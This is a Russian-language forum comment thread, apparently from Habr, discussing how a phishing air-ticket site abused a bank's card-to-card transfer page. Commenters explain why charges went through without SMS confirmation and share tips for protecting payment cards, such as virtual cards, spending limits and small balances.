        Вообще, это банальный фишинг, щедро приправленный бестолковой защитой карты. Печально всё это.
        • +2
          «Я так и не понял, зачем вообще что-то куда-то встраивать, если можно тупо украсть код и «на той стороне» всё отправить?»

          Это мне вопрос? Думаю, чтобы не замарачиваться с подменой IP при множественных переводах с разных карт на одну.
          • +3
            На карту, видимо, без подтверждения 3D Secure проблематично отправить, если вообще возможно. Покупатель сам вводит код подтверждения. Иногда по несколько раз. И после человек может в течение нескольких дней даже не подозревать, что его обманули. Если дополнительная активность по карте не проявится, то покупатель авиабилетов может узнать о мошеннических действиях со своей картой даже в аэропорту. Чем быстрее жертва мошенников заявит в свой банк, тем больше шансов аннулировать транзакцию и, возможно, даже найти следы мошенников. А через неделю шансы что-то найти и вернуть снижаются очень сильно.
            И еще, если кто-то перехватил данные карты, чтобы перевести деньги на другую карту, ему нужно с какого-то компьютера выходить в сеть, набивать намера итп. При массовых переводах скорее всего останутся следы. А если покупатель сам перевод осуществляет, то в логах платежных систем ничего нет, — IP мошенников нигде не записываются. Единственная зацепка — это веб сайт мошенников.
            Один раз автоматизировал все — и пошел отдыхать.
            Возможно в этом причина.
            • +1
              «если кто-то перехватил данные карты, чтобы перевести деньги на другую карту, ему нужно с какого-то компьютера выходить в сеть, набивать намера итп.»

              Лично я понял из того, что вы написали в статье что именно так они и делали. Автоматизированная часть воровства заключалась только в первой транзакции, которая финансировала рекламную кампанию. Все остальное — вручную.
              • 0
                Судя по сумме — активировали какой-то автоплатёж. Возможно — сразу при транзакции.
                • +3
                  Возможно, это и так. Только наоборот. Первая часть перевод на карту (т.е. себе в карман), а уже вторая и последующие часть на рекламную компанию. На рекламную компанию средств тратится больше, чем на вывод на карты. Причем ручная это работа во второй части или автоматизированная, тоже не известно. По крайней мере на частично автоматизированную похожа.

                  Пока остатка хватало, списания были с интервалом ровно в 10 минут. А как точно заметил Stryker86 в одном из комментариев, суммы списания кратны изначальной сумме 5900 р (11800, 17700, 23600). Совпадение? Не думаю.
            • –3
              > тупо украсть код

              Если вы про код из смс, то он одноразовый и высылается по смс только после заполнения всех форм и нажатия кнопки «ок».
              Его нельзя украсть, его можно только обманом узнать у пользователя.
            • +2
              Там фреймов нету, есть клиент-серверная прокладка.
              Но в итоге браузер шлёт запрос серверу Тинькова? И у запроса можно проверить referrer.
              • 0
                «Но в итоге браузер шлёт запрос серверу Тинькова?»

                Думаю, да. Там ведь куча скриптов от оригинальной страницы p2p перевода. Зачем еще тебе нужны чужие работающие скрипты?

                «И у запроса можно проверить referrer.»

                Вас хоть сколько-нибудь удивит если в этой истории окажется, что они НЕ проверяют referrer?
                • 0
                  referrer заполняется отсылающей стороной, сервер его получает в готовом виде от клиента. Подделывается легко.
                • +11
                  В итоге сервер злоумышленника шлет запрос серверу Тинькова.
              • 0
                Вы невнимательно читали статью.
                Причем здесь используется не окно iframe.
                • +2
                  Да и ни один современный браузер не даст джаваскрипту изменять код в iframe стороннего сайта (напр. вписать номер карты получателя), даже при отсутствии заголовка X-Frame-Options, только ввод самого пользователя. SOP однако…
                  • +1
                    Они и не дают. Эти халтурщики даже поленились распарсить страницу с сайта Тинькова и отдавать клиенту только необходимые данные, а, видимо, просто регулярным выражением добавляют display: none в необходимые блоки.
                    • +3
                      Они даже поленились поставить препроцессор на стороне сервера. Всё на стороне клиента происходит.
                    • +5
                      Я думаю это скорее реклама AdBlock. Или еще один повод вырезать Яндекс.Директ…
                      Сори, веткой ошибся…
                    • 0
                      Мне тоже не понятно как без подтверждения смс они смогли списывать суммы. Да и почему бы лишние деньги на карте не скидывать в какой-нибудь вклад, накопительный счет или сделать карту у которой свой счет, не привязанный к основному.
                      • +2
                        Recurring payments. Во многих сервисах так (где предусмотрена абонентская плата): достаточно один раз заплатить, а дальше та же сумма будет регулярно сниматься без вашего участия.

                        В данном случае, правда, суммы были разные, но технически это возможно.
                        • 0
                          но был же платеж на карту просто? У сбера вроде такие вещи можно только через кабинет делать, или нет?
                          • +2
                            Про сбер не знаю, пользуюсь другой картой.

                            Но своему провайдеру и компании Blizzard я именно так и плачу — единожды ввёл на их сайте данные карты (и код из СМС), а они дальше ежемесячно сами списывают с неё абонентскую плату.
                            • 0
                              Гугл так же сам ежемесячно списывает оплату своих сервисов.
                              • 0
                                DEL
                                • 0
                                  У Близзов уровень доверия у визы/мастеркарда овер 9000, так что им можно. У амазона и годэдди тоже самое — им достаточно только номер кредитки, всё остальное не проверяется, даже дата и CVC.
                              • +2
                                Аналогично у PlayStation®Store. Люди, оплатившие с зарплатной карты, часто там страдают от автоматического списания, покупок игр с консоли.
                                • 0
                                  Там только продление подписки ПСН автоматическое (которое можно отключить), все остальное проходит через ваш пароль и тысячу вопросов…
                                  • +1
                                    а WoW когда-то вообще не парясь карту высасывал.
                                    • +1
                                      Если карта привязана к аккаунту, то покупка совершалась (два года назад) тихо без вопросов. Было очень актуально, когда крали аккаунты — успевали купить на этом аккаунте на солидные суммы, пока пользователь успевал понять и заблокировать зарплатную карту.
                                      • +1
                                        У меня при покупке игр, как в Стиме, так и в ПСН ничего не требует. Убер, тот же, списывает не спрашивая.
                                        • 0
                                          Алиэкспресс ничего не требует, списывает просто по кнопке «Купить». Правда, для этого нужно предварительно привязать карту к своему аккаунту :)
                                          • –1
                                            Gearbest — оплачиваю через PayPal с привязанной картой от сбера, тоже ничего не спрашивает.
                                            • +1
                                              Так тут жирбест не при чем, все данные есть у пэяпэла, им на любом сайте оплачивайте и ничего спрашивать не будут
                                          • 0
                                            у меня Стим всегда требует CVC2-код карты.
                                            а вот Amazon ( магазин), Apple (и AppStore и iTunes Store), Google Play — спокойно с привязанных карт списывают вообще без всяких вопросов относительно карты.
                                          • 0
                                            Нет. У меня пару раз было, что они автоматически какие-то игры покупали за меня. Не знаю, баг это или что.

                                            Хорошо хоть, по запросу в таких случаях они деньги возвращали всегда.
                                        • +15
                                          Заметил, что суммы списания в статье кратны изначальной сумме 5900 р (11800, 17700, 23600)…
                                          • +6
                                            А вам случайно не кажется скучным, и непримечательным число 1729?
                                            • +1
                                              Рамануджан, перелогиньтесь.
                                            • 0
                                              Интересное наблюдение про кратность сумм 5900-11800-17700-23600. Спасибо.
                                              • +21
                                                НДС 18% :)
                                                5 000 + 18% = 5 900
                                                10 000 + 18 % = 11 800
                                                15 000 + 18% = 17 700
                                                20 000 + 18% = 23 600
                                            • 0
                                              В результате обманных действий покупатель подтвердил отправку денег на чью-то карту, а скорее всего на две разных. Если бы регулярная отправка была на эти же карты, то это может быть похоже на то, о чем Вы пишите. Но регулярная отправка включилась как раз совсем на другого получателя, на которого покупатель согласия не давал даже по ошибке.
                                            • +3
                                              На карте всего было 40 тысяч рублей. Что же нужно держать на карте по пять тысяч рублей и постоянно гонять деньги туда-сюда? Мороки слишком много.

                                              Алиэкспресс списывает деньги тоже без всяких смс.
                                              • +6
                                                > Что же нужно держать на карте по пять тысяч рублей
                                                Если нет желания когда-нибудь писать десятки заявлений-жалоб-требований вернуть деньги, подобные посты на хабре и в итоге все-равно остаться без денег, то да — на активной карте, которую вы светите в интернете, в кафе и магазинах в любой момент времени должна быть только сумма, потерю которой вы переживете не сильно расстроившись.
                                                • +1
                                                  И всё равно нужно писать заявление, а то «не сильно расстраиваться» придётся постоянно.
                                                  • 0
                                                    Собственно у Тинькова можно выпустить 5 доп карт установить там лимиты и пользоваться ими, а основную хранить под замком.
                                                    • +1
                                                      Как быть с кредиткой? Первести с неё на другую — вылет из грейса. Платить по дебетовке — туда надо ещё деньги сначала где-то взять, чтобы положить.
                                                      • 0
                                                        С кредиткой вообще плохо — с неё такими методами могут наснимать денег до выборки лимита по кредиту.
                                                        • 0
                                                          Успокаивает то, что там грейс и вообще деньги не мои. Пусть докажут, что я их взял.
                                                          • 0
                                                            Всё равно неприятно. И возможна блокировка счёта на период выяснений.
                                                        • 0
                                                          Если так неймется платить кредиткой в интернетах, возможны 2 варианта навскидку:

                                                          1. Выпустить вторую карту к счету и установить по ней лимиты жесткие.
                                                          2. Если банк хреновый и не позволяет такого сделать, установить лимит на операции в интернете 0р, перед покупкой ставить нужный лимит, после покупки опять устанавливать в 0р.
                                                          • +1
                                                            Не то, чтобы неймётся, но там кешбек 3%, да и не надо делать лишние движения по поводу её пополнения.
                                                            Лимиты не совсем удобно: всякие автоплатежи на сотовые, интернет будут блокированы.
                                                            У меня для расходов на машинку дебетовка с 5% каши — а свободных денег не так уж много, приходиться безконца бабки тусовать с одной карты на другую, по мере их появления, очень неудобно: заезжаешь на АЗС и хлопаешь себя по лбу, что на карте рублей 300, а надо на 50 литров. Запускаешь браузер в телефоне и давай туда-сюда по c2c деньги гонять, благо что бесплатно.
                                                            • 0
                                                              А в чем беда установить лимит на платежи через инет в 1000р в месяц? Или во сколько там вам автоплатежи за интернет с сотовым обходятся? Даже если хулиганы упрут данные карты, много вы не потеряете.
                                                              • 0
                                                                Немного оффтопика — а можно подробнее про 3% и 5% кэшбека? Это где такое?
                                                                • 0
                                                                  Бинбанк, там в выбранной категории — 5%, у меня категория авто: АЗС, запчасти, сервисы, мойки.
                                                                  Можно активировать категорию покупки в интернете. Но все квазикеш операции типа пополнения яндекс-денег и киви кошелька — мимо.
                                                                  Кукуруза — 3% фантиками, можно потратить в перекрёстке на 30% чека, в Евросети 99%. Раньше было ТНК — я в 15-м году в отпуск на машине ездил, слил на 8000Р бензина бонусами(больше просто не успел), ещё там же купил огнетушитель, трос и промывку инжектора(как я и предполагал — хрень оказалась, но за бонусы не жалко).
                                                                  • 0
                                                                    Разные банки разные проценты кэшбэка предлагают. Во многих банках есть кэшбэк с высокой ставкой на какую-то отдельную категорию. Многие из этих банков придумывают разные хитрости, чтобы клиентам было как можно сложнее воспользоваться повышенной ставкой. Эти хитрости могут заключаться в том, что категория товаров каждый месяц или каждый квартал меняется. Поэтому клиенту банка трудно просчитать заранее, как получить максимальный кэшбэк. А читать новости, рассылки итп с сообщениями, какая сейчас категория товаров у банка в почете, это очень утомительно. Есть еще банки, которые не сразу начисляют кэшбек, а просят в личном кабинете по каждой операции делать отметку, что она попадает под условия акции итп.

                                                                    Я знаю один банк, который не морочит клиентам голову со сложными условиями — Бинбанк. Возможно есть и другие такие же. Но из тех, что на виду, таких простых условий не встречал. Кэшбек 1% на обычные покупки, 5% на одну из пяти категорий, которую сам клиент выбирает. При этом категория со временем без участия клиента не меняется. Самая интересная категория — интернет-покупки. Если ее выбрать, то при покупке в интернет-магазинах будет кэшбэк 5%.

                                                                    Единственное, стоит иметь в виду, интернет-магазины принимают платежи по-разному и возможна ситуация при которой ни 1%, ни 5% ни зачислят при покупке. Для примера, один из самых крупных компьютерных интернет-магазинов принимает платежи по картам через сервис Яндекс.Деньги. При покупке в этом магазине кэшбек не зачисляют. Вероятно для банка такая покупка выглядит, как пополнение кошелька Яндекс.Денег или что-то похожее. А за пополнение кошельков итп кэшбек не начисляют. Клиент при оплате картой разницу не замечает, а для банка разница есть. Поэтому перед оплатой нужно смотреть, как интернет-магазин принимает платежи по картам. Если прием платежей организован через банки эквайеры, кэшбек 5% точно начистят, в остальных случаях, как повезет.
                                                                    • +1
                                                                      Что за загадки «один из самых крупных компьютерных интернет-магазинов»? Почему нельзя сразу прямо написать название, к чему эта недосказанность?
                                                                      • 0
                                                                        При написании комментария я прямо написал название этого магазина. Но при предпросмотре обратил внимание, что движок этого сайта название вырезал. Поэтому пришлось переписать фразу.
                                                                        • –1
                                                                          Публика всё ещё с нетерпением ждёт.
                                                              • 0
                                                                А можно управлять суточными лимитами.
                                                                Лайфхак «от бывалого»
                                                                Заводится несколько допкарт для разных целей. Для постоянного ношения с собой: лимит на операции в месяц + лимит на снятие наличных в сутки. В интернете не светится. Для трат в интернете: минимальный лимит на операции в месяц, минимальный лимит на снятие. Перед оплатой лимит на операции поднимается на размер операции. Через мобильный банк это делается за 2 минуты.
                                                                При этом не важно — карта кредитная или дебетовая.
                                                            • +2
                                                              > Что же нужно держать на карте по пять тысяч рублей
                                                              > и постоянно гонять деньги туда-сюда? Мороки слишком много.

                                                              * Держать на карте нужно ноль и непосредственно перед покупкой
                                                              переводить на карту нужную сумму. Дело пары минут.

                                                              * Выделенная карта для интернет покупок.

                                                              * Ну и покупать билеты не у посредников, а на сайте авиакомпании.
                                                              • +1
                                                                Именно так. Причем многие банки позволяют выпустить виртуальные карты, без «пластика» как раз для оплаты в разного рода онлайн-сервисах. А закинуть денег с карты на карту дело пары минут.

                                                                Это предотвратит дальнейшее списание, но за мошеннические «билеты» деньги все равно уведут. Тут только разбираться с банком об отмене перевода.
                                                                • +1
                                                                  Не знаю, как у других, но в Альфа банке выпуск виртуальных карт был платный и жили они всего два месяца. Дорого и неудобно. Проще и дешевле выпустить для таких целей реальный пластик.
                                                                  • 0
                                                                    Не совсем так. Есть у Альфы Мастеркард виртуал в пластике со сроком 2 года.
                                                                    • +1
                                                                      Если он в пластике, то что же в нём виртуального?
                                                                      • +2
                                                                        У него нет чипа, магнитной полосы и эмбоссирования.
                                                                        • +5

                                                                          А зачем тогда нужна непонятная пластмассовая хрень?

                                                                          • +2
                                                                            на ней номер написан :)
                                                                            не знаю, может у банков есть какие-то внутренние требования по этому поводу, но в интернет-банке этот номер не виден, и передать сотрудники банка мне его могут исключительно в виде пластмассовой хрени
                                                                            • +1
                                                                              В России нет таких требований. У меня часть номера виртуальной карты видно в интернет-банкинге, а другая часть пришла в виде СМС, вместе с датой с CVV.
                                                                              • +1
                                                                                У нас КазКоммерцБанк позволяет через интернет-банкинг открыть сколько угодно мультивалютных виртуальных карт сроком на 10 лет за символические 1 тенге, но с комиссией в 1% за любой платеж.
                                                                                Имея такую возможность каждый раз удивляюсь тем кто привязывает к разным интернет аккаунтам зарплатную карту.
                                                                                • +1
                                                                                  Вот только у других банков за оплату в интернете идёт кэшбэк от 1 до 3%, а не снятие комиссии в 1%.
                                                                    • +2
                                                                      QIWI, Яндекс.Деньги позволяют выпустить виртуальную карту за секунды. Закрыть ее и/или перевыпустить можно в любой момент. QIWI, кроме того, позволяет выпустить непополняемую «одноразовую» виртуальную карту. Т.е. если просто уделить некоторое внимание вопросу и посмотреть чуть шире, то окажется, что фраза «проще и дешевле выпустить для таких целей реальный пластик» не имеет под собой оснований.
                                                                      • +1
                                                                        Не все пользуются QIWI и YM. Лично я — даже не собираюсь. Особенно, QIWI.
                                                                        • +1
                                                                          Ну так соберитесь. ;)
                                                                          • 0
                                                                            QIWI славна тем, что сама любит списывать деньги со счета, если их сервисом долго не пользоваться.
                                                                            • 0
                                                                              А еще, вот этим: https://habrahabr.ru/post/193554/
                                                                              • 0
                                                                                Факапы могут случиться у каждого. Про Wells Fargo слышали? Не чета QIWI, с какой стороны ни посмотри. А вот ведь: http://finview.ru/2016/09/09/zerohedge-com-3-65/
                                                                              • 0
                                                                                Ну как бы мы говорим об использовании сервиса исключительно в качестве «прокладки» — для кратковременного хранения средств, предназначенных для оплаты в интернете. Т.е. это инструмент такой, в сценарии использования которого для нашей цели ситуаций «если долго не пользоваться» быть не может по определению.

                                                                                Кроме того, МегаФон, например, тоже славен тем, что через полгода (или другой срок, не помню) неиспользования номера включается ежемесячное списание определенной суммы. И что? Вы не используете МегаФон? Без проблем. ;) Но я — использую уже лет 12 где-то и не планирую пока отказываться. Просто если номер мне не нужен — я убираю с него деньги и закрываю.

                                                                                Мне как бы не с руки агитировать и рекламировать сервис, особенно вне рамок обсуждаемого сценария использования, но коль вы уж привели аргумент, то и я тоже приведу — я использую QIWI в качестве основного платежного средства, с виртуальными картами, с реальным пластиком (который уже перевыпускал дважды), т.е. достаточно долго, лет 5-6. И я искренне не понимаю смысла вашего аргумента, поскольку QIWI — не депозит, денег там хранить не нужно, а тем более, долгое время и не используя. Могу «сыграть на вашей стороне» и подкинуть еще аргументов — например, если вы перестали пользоваться номером, то через какое-то время, после отлеживания, оператор его продаст другому абоненту, который, таким образом, получит доступ к вашему QIWI-кошельку. Это так? Абсолютно. Это имеет какое-то значение для меня, как пользователя? Нет, если я не идиот, извините.

                                                                                Понимаете, если, например, не пользоваться долго автомобилем, то у него рано или поздно спускают шины, садится аккумулятор, рассыхаются резинки в подвеске, «протухает» масло в двигателе и ржавеет кузов. Через 3-5 лет — это уже не автомобиль, а труп. Следует ли отсюда, что нам теперь не стОит покупать автомобили? ;) Да, следует — в том случае, если вы не собираетесь на них ездить, а собираетесь сгноить на стоянке.
                                                                          • 0
                                                                            Проблему дальнейших списаний это решит, а вот с кем разбираться в случае мошеннической покупки, как в случае с товарищем автора. Как мне кажется — QIWI и ЯДеньги достаточно мутные конторы в плане ответственности перед законодательством. Хотя я интересовался данными системами достаточно давно и уже долгое время не слежу за развитием ситуации. Может быть что-то и изменилось.
                                                                            • 0
                                                                              Не более мутные, чем банки за пределами первой десятки.
                                                                              • 0
                                                                                Возможно. Привык к Сберу и Возрождению. С остальными банками почти не пересекаюсь.
                                                                              • 0
                                                                                Мутные-то мутные, но в качестве промежуточной прокладки вполне годятся.
                                                                                Нельзя списать со счёта больше чем на нём есть
                                                                                • 0
                                                                                  Вообще то в некоторых случаях можно. Технический овердрафт. Сама возможность связана с тем что списание с карты идет как бы в два этапа — авторизация (сразу) и непосредственно списание (через несколько дней но может быть до месяцев) и при этом:
                                                                                  — могут отличаться курсы на эти моменты.
                                                                                  — существуют (не касается обычно Интернета) операции когда просто приходит списание и банк обязан списать, да — загоняя карту в минус если надо
                                                                                  — существуют операции (обычно не в России) когда и авторизация и списание приходят с задержкой. если денег нет — будет теховердрафт.

                                                                                  А еще существует такой банк как Сбербанк, за которым замечалось устройство теховедрафта (именно теховердрафта а не блокировки) по просьбе приставов
                                                                          • 0
                                                                            Можно оплачивать через яндекс деньги с привязанной картой, которую можно легко отвязать и не засвечивать банковскую. Я к тому же привязал специальную карту для расчетов со своим счетом.
                                                                            • 0
                                                                              Я вообще не привязывал, просто ручками перекидываю нужную сумму
                                                                          • 0
                                                                            Билеты у посредников иногда дешевле, чем на сайте авиакомпании. Редко, но бывает.
                                                                            • 0
                                                                              Перед сезонами заметно — авиакомпании поднимают цены, а посредники уже выкупили кучу мест и торгуют ими по ценам ниже авиакомпаний, но значительно дороже чем покупали. Плюс скидки за опт. Вывод — покупать билеты надо либо сильно заранее, либо в день вылета (на горящие билеты часто скидки). Хотя в последнее время цены на сезонные билеты авиакомпании держат весь год.
                                                                              • 0
                                                                                В день вылета покупать не вариант, если направление популярное.
                                                                                • 0
                                                                                  Тут от многих факторов зависит. В любом случае перед покупкой вопрос надо обстоятельно изучать.
                                                                            • 0
                                                                              я например для этой цели пользуюсь виртуальной картой Яндекс Денег. Именно дня онлайн покупок. А на нее кладу нужную сумму со сберовской карты через СБ-онлайн. дело 1 минуты.
                                                                              • 0
                                                                                Так же можно было купить тикеты в онлайнБанкинге у Сбербанка. но увы, кто-то погнался за дешевизною. Итог, очень печален.
                                                                              • 0
                                                                                1. Использую физические карты для держания валюты (карты с собой не таскаю), еще есть именная карта в гривне (конвертирую в 5-10К гривен в месяц для растрат). Для оплаты в интернет есть электронные (виртуальные) карты на которые, при необходимости перевожу с реальных карт деньги.

                                                                                2. Меняйте банк.
                                                                              • +3
                                                                                Похоже так же как списывает Amazon, Microsoft и кстати Aliexpress(но в последнем карта по дефолту к счёту не привязывается).
                                                                                Достаточно один раз оплатить и за продление услуг будут списывать постоянно и без подтверждения через 3D Secure/Verified by Visa.
                                                                                Для себя нашел выход из подобных ситуаций при работе с подобными сервисами:
                                                                                Указывать дебетовую карту с отключенными кредитными/овердрафтовыми «фишками» и пополнять карту непосредственно перед оплатой(т.е. по получению уведомления об отключении сервиса) на требующуюся для оплаты сервиса сумму и не монетой больше.
                                                                                • +1
                                                                                  + adobe еще
                                                                                  • +4
                                                                                    Amazon у меня списал деньги без CVV кода и без 3D Secure, просто по номеру карты
                                                                                    • –2
                                                                                      да вы что? и без экспайра и cvv?
                                                                                      • +5
                                                                                        C «экспайром» и без cvv.
                                                                                        • 0
                                                                                          Занятно. Я не знал, что можно без cvv.

                                                                                          Получается, для платежа достаточно фото передней части карты.
                                                                                          • 0
                                                                                            Я тоже удивился, даже уточнял в поддержке, и это при том, что заказывал я на адрес посредника.
                                                                                            • 0
                                                                                              И вот как теперь, зная об этом, расплачиваться картой в магазинах, где обязательно нужно передать её кассиру?
                                                                                              • 0
                                                                                                Даже не обязательно её кому-то давать. Современные камеры вполне могут помочь рассмотреть все надписи на карте, а карточка, обмотанная изолентой, боюсь, не сможет работать в картоприёмниках.
                                                                                                • 0
                                                                                                  Ну, когда карта в у владельца в руках, её можно прикрывать ладонью, ещё как-то мешать камерам.
                                                                                                  Но в целом я соглашусь — камеры помогают мошенникам.
                                                                                                  • 0
                                                                                                    Вы можете стереть cvv код, а хранить его где то в другом месте а не прямо на карте. Или запомнить — пин код же помните, а тут всего три цифры. Остальное стереть сложней, но хоть cvv надо то удалить
                                                                                                    • 0
                                                                                                      Так суть то в том, что cvv не везде нужен.
                                                                                                      • 0
                                                                                                        Ну без cvv Вы все таки ощутимо усложняете злоумышленнику задачу снятия денег с кредитки.
                                                                                      • 0
                                                                                        На Aliexpress оплата идет через AliPay — там то и хранится информация о Вас и Вашей карте. Не знаю как сейчас, но AliPay спрашивает иногда месяц, год и CVV/CVC карты. А если оплачивать через мобильное приложение Aliexress, то, если не ошибаюсь, вообще ничего не спрашивает.
                                                                                        • 0
                                                                                          Так речь не о данных карты. А об одноразовых смс паролях.
                                                                                          • 0
                                                                                            Сегодня платил на Али — не пришла смс с кодом из банка, а 3dsec включен.
                                                                                            • 0
                                                                                              а спросите в банке как они отреагируют если в ответ на запрос 3D Secure от экваера придет ответ что не поддерживается, давайте в обычном режиме? судя по описанию — согласятся провести в обычном режиме. Но имеют право и отказать. Могут другие лимиты применить.
                                                                                              Как пример:
                                                                                              — Укрсиббанк https://my.ukrsibbank.com/ru/personal/questions/card_limits/
                                                                                              — Казахстанского Альфа-Банка http://www.alfabank.kz/ru/retail/cards/restrictions
                                                                                              лимиты на операции без 3D Secure — 0

                                                                                              вот Российских банков где есть такое — я не знаю.
                                                                                              • 0
                                                                                                Именно.
                                                                                                Сам сегодня платил на Али, дважды. Первый раз с PC, перед этим «привязав» карту к AliPay (+месяц, год, CVV/CVC-код тоже указал).
                                                                                                Второй раз платил через мобильное приложение. Там ничего указывать вообще не пришлось. Даже никакого секретного кода. Тут вижу два варианта решения: либо лочить смартфон настолько, насколько веришь во все эти экраны защиты, либо через АлиПей (да и вообще любые интернет-платежи проводить) через спец-карту, перекидывая туда средства за 1-2 минуты. У Тинькова в этом плане очень удобно.
                                                                                                • 0
                                                                                                  Насколько знаю, 3d Secure должен запрашивать магазин-продавец. Если не запрашивает, банк проведёт операцию без него.
                                                                                                  Я интересовался в банке А по поводу возможности отключить платежи без 3D Secure для моей карты. Сказали, что невозможно технически.
                                                                                            • 0
                                                                                              + разные регистраторы доменов, для продления могут списать автоматом, не спрашивая ничего дополнительно
                                                                                            • +3
                                                                                              Так вроде же на 3D-S настаивает не банк, который выпустил карту, а платёжная система, через которую происходит оплата. Есть сайты где смс попросят ввести, есть сайты где этого не требуется.
                                                                                              • 0
                                                                                                Допускаю, что это так и есть. В смс от Сбербанка, в списаниях было указано «YM*Yandex.Direct» Если предположить, что платежный посредник решает, требовать ли код подтверждения, то, как я писал в статье, возникают вопросы либо к Yandex.Money, либо к Yandex.Direct.
                                                                                                • 0
                                                                                                  Подтверждаю. Имел дело с гейтом от Payeezy, там настройка 3D secure опциональна. Тоже был удивлен и техподдержка моего банка сказала что да, оплата возможна и без смс.
                                                                                                  • +1
                                                                                                    Мне в банке подтвердили, что 3D-secure не на их стороне, и деньги можно и без него списать, как захочет тот, что снимает деньги. ИМХО это вообще бред и смысла я тогда не вижу в такой технологии.

                                                                                                    Более того, я пару раз в магазине вводил неверный пинкод, о чём мне сообщал терминал, но там была возможность продолжить. Нажимая Да, я завершал покупку не вводя повторно пинкод. Деньги снимались.
                                                                                                    Один раз вообще дал сыну карту и попросил его так оплатить покупку и он это сделал. После чего я позвонил в Росевробанк и попросил объяснить эту ситуацию. Сказали, что до 4000 может не требоваться ввод пинкода.
                                                                                                    Ужасно всё это.
                                                                                                    • 0
                                                                                                      нажимая отмену, выполняется оплата по подписи. Допустимо при не очень больших суммах и при не-запрете оплаты по подписи банком. Чеки при этом обычно различаются, «введен пин-код» и «подпись клиента».
                                                                                                      • 0
                                                                                                        Не обязательно ошибаться при вводе даже. Обычно достаточно нажать «отмена» на первое предложение терминала ввести пин-код и оплата пройдет и без него.
                                                                                                        Правда не всегда(но чаще всего ОК), обычно на небольшие суммы (большая не пройдет) и по-идее в этом случае кассир должен потребовать поставить подпись на чеке.
                                                                                                        Но я последнее время при покупках до 1-2 тыс. руб оплачиваю и без пинкода и без подписи — все проходит и так, кассиры на подпись или забивают или вообще не соображают что нужно ее запрашивать…

                                                                                                        А на случай подобной жести как в статье просто не держу существенных сумм на расчетной карте — только на текущие мелкие расходы. Или закидываю через ИБ непосредственно перед более крупной покупкой нужную сумму.
                                                                                                    • 0
                                                                                                      Да сколько бы на счету денег не было. Это другая история. Не все банки имеют настройки безопасности, где можно ограничивать сумму списания через интернет банкинг или на снятие налички. Тут как и всегда действует правило «предупрежден значит вооружен».
                                                                                                      • +6
                                                                                                        Проверка CVV и 3Dsecure — добрая воля мерчанта (магазина). С другой стороны, если владелец карты опротестовывает платёж, деньги ему тоже возвращает магазин, через который прошел платёж. В данном случае, это, очевидно, должен быть P2P-сервис, позволивший перевод.
                                                                                                        • +2
                                                                                                          При использовании 3dSecure в случае претензий пользователя мерчанту ничего не грозит, риски берет на себя банк или эквайринг (точно не знаю).
                                                                                                        • +5
                                                                                                          Мне тоже не понятно как без подтверждения смс они смогли списывать суммы.
                                                                                                          1. Злоумышленник регистрируется в любом сервисе, например, Яндекс.Деньгах, Amazon, Paypal, вводит свой номер мобильного телефона, если нужно.
                                                                                                          2. Привязывает карту человека, который ввел ее данные на фишинговом сайте, сделанным злоумышленником.
                                                                                                          3. СМС от сервиса приходит злоумышленнику, а СМС от банка о снятии и возврате средств для проверки работоспособности карты — владельцу карты.


                                                                                                          В крупных сервисах, которые привязывают карту к себе, обычно нет 3D Secure. Amazon вообще даже CVV/CVC2 не требует, только номер карты и срок действия. Большинство сервисов не проверяют введенное имя, я всегда ввожу DICK BUTT, получал только один раз отказ.

                                                                                                          Вообще, безопасности оплаты картами в интернете застряла где-то в каменном веке. По возможности, платите только электронными деньгами. По моему мнению, Webmoney на голову выше конкурентов по безопасности и удобству использования: для подтверждения платежей не требуется принимать СМС или иметь мобильный телефон под рукой вообще — есть приложение E-Num, которое генерирует одноразовые коды, принимая на вход кошелек, которому переводятся средства, сумму, challenge-код. Входные данные прилетают либо через Push, либо их можно считать камерой с QR-кода на экране оплаты, либо вообще вручную ввести. И приложение есть под все платформы, даже под Symbian и Java оно до сих пор работоспособное, не говоря уже о Blackberry и Bada.
                                                                                                          • 0
                                                                                                            СМС от сервиса приходит злоумышленнику, а СМС от банка о снятии и возврате средств для проверки работоспособности карты — владельцу карты.

                                                                                                            Не знаю на счет всего, но чтобы подтвердить PayPal нужно ввести код из описания транзакции. Я этот код мог видеть только в клиент-банке, например.
                                                                                                            Электронные деньги мне кажутся весьма мутной темой, но оболочка над платежами вроде PayPal — отличная вещь. Проблема только в том, что далеко не все сайты его поддерживают.
                                                                                                            Ну и вообще небезопасность кредиток компенсируется относительной простотой возврата денег. Плюс банки научились неплохо так определять подозрительные транзакции. Да, это костыль, но всё же не стоит параноить сильно.
                                                                                                            • +5
                                                                                                              но оболочка над платежами вроде PayPal — отличная вещь. Проблема только в том, что далеко не все сайты его поддерживают.
                                                                                                              Он хорош для клиентов, но головная боль магазинов. По мнению Paypal, прав в большинстве случаев клиент, даже если клиент неправ. А еще Paypal берет процент с магазина за свои услуги.

                                                                                                              Ну и вообще небезопасность кредиток компенсируется относительной простотой возврата денег.
                                                                                                              Мне не нравится, что вообще существует возможность воспользоваться моей картой, если ее данные кому-то попали в руки. В случае с электронными деньгами, я всегда заранее знаю, кому и сколько я плачу, и нет возможности снять мои деньги без подтверждения с моей стороны.

                                                                                                              К тому же, у большинства банков уведомления об операциях с картой приходят только по СМС. Я телефоном пользуюсь редко, для меня это неважная вещь, и СМС я могу просто не увидеть, поэтому мне приходится писать скрипты для каждого банка отдельно, которые раз в 15 минут входят в интернет-банкинг, парсят страницу и отправляют уведомление по почте, если баланс изменился.
                                                                                                              Раньше у ВТБ24 были замечательные карты одноразовых кодов — безопасные, маленькие, не требующие канал связи и электричества — но их заменили на СМС-коды, которые ни разу не безопасны и требуют наличие телефона.
                                                                                                              • 0
                                                                                                                Абсолютной безопасности не существует. Мне вот тоже не понравилось бы, что кто-то пользуется наличностью из моего кошелька, но я не могу гарантировать 100-процентную сохранность этой наличности (ну, кроме варианта не использования её вообще). Так что мне кажется, что всё упирается в уровень вашей параноии по отношению к юзабилити.
                                                                                                                • 0
                                                                                                                  > А еще Paypal берет процент с магазина за свои услуги.

                                                                                                                  Это все берут. На этом и зарабатывают.
                                                                                                                  • +1
                                                                                                                    Webmoney берет 0.8% с отправителя, например. PayPal берет около 4%. Причем не только с магазина, попробуйте отправить деньги из страны в страну. А еще у них просто ужасный курс (для покупок это можно отключить, а для вывода уже нет).
                                                                                                                    • 0
                                                                                                                      При переводе денег палка спрашивает с кого списывать комиссию — с отправителя или получателя.
                                                                                                                  • 0
                                                                                                                    за 500 руб у них есть генераторы кодов, это отдельные устройства
                                                                                                                    • 0
                                                                                                                      Это устройство, увы, практически невозможно использовать в упомянутых автором предыдущего ответа скриптах. Сам мучаюсь :(